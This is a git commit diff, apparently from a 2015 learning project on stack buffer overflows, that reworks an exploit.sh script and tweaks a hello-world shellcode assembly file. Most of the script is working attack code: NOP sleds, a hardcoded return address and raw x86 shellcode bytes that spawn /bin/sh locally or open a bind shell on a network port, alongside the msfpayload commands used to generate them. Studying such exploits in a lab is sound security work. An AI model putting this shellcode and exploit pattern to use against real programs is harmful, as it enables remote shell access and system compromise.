diff options
| author | toni <toni@devlap.local> | 2015-03-30 19:29:36 +0200 |
|---|---|---|
| committer | toni <toni@devlap.local> | 2015-04-05 11:55:17 +0200 |
| commit | 48ed2c30cac4c144690ddf5e56c6b366636184f0 (patch) | |
| tree | e20871adcb3daeb0a8b19cbabd758a90fa4c8033 | |
| parent | 5613fcfa7d0c54766e7cc282bebbc3d6782cde5c (diff) | |
- added newline to hello_world shellcode
| -rwxr-xr-x | exploit.sh | 27 | ||||
| -rw-r--r-- | shellcode/hello.asm | 4 |
2 files changed, 23 insertions, 8 deletions
@@ -2,11 +2,26 @@ # shellcode generated with metasploit (exec /bin/sh): # ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' +# return addr ./overflow (x86): 0xbffff412 -# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr +if [ -z "$1" ]; then + echo "$0 [local|bind]" + exit 1 +fi -#./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'` - -# bindshell -# 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP -./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x8c\xd3\xff\xff"'` +echo "$0: exec exploit .." +if [ "$1" = "local" ]; then + if [ $(getconf LONG_BIT) -eq 32 ]; then + # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr + # uses own shellcode: shellcode/hello.asm (x86-nasm) + ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\x12\xf4\xff\xbf"'` + fi +elif [ "$1" = "bind" ]; then + if [ $(getconf LONG_BIT) -eq 32 ]; then + # 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP + return addr + # uses own shellcode: shellcode/socket.asm (x86-nasm) + ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x12\xf4\xff\xbf"'` + fi +else + $0 +fi diff --git a/shellcode/hello.asm b/shellcode/hello.asm index 13eaaff..ef42f2f 100644 --- a/shellcode/hello.asm +++ b/shellcode/hello.asm @@ -8,7 +8,7 @@ jmp short string code: pop ecx mov bl,1 -mov dl,12 +mov dl,13 mov al,4 int 0x80 dec bl @@ -16,4 +16,4 @@ mov al,1 int 0x80 string: call code -db 'Hello World!' +db 'Hello World!', 0x0A |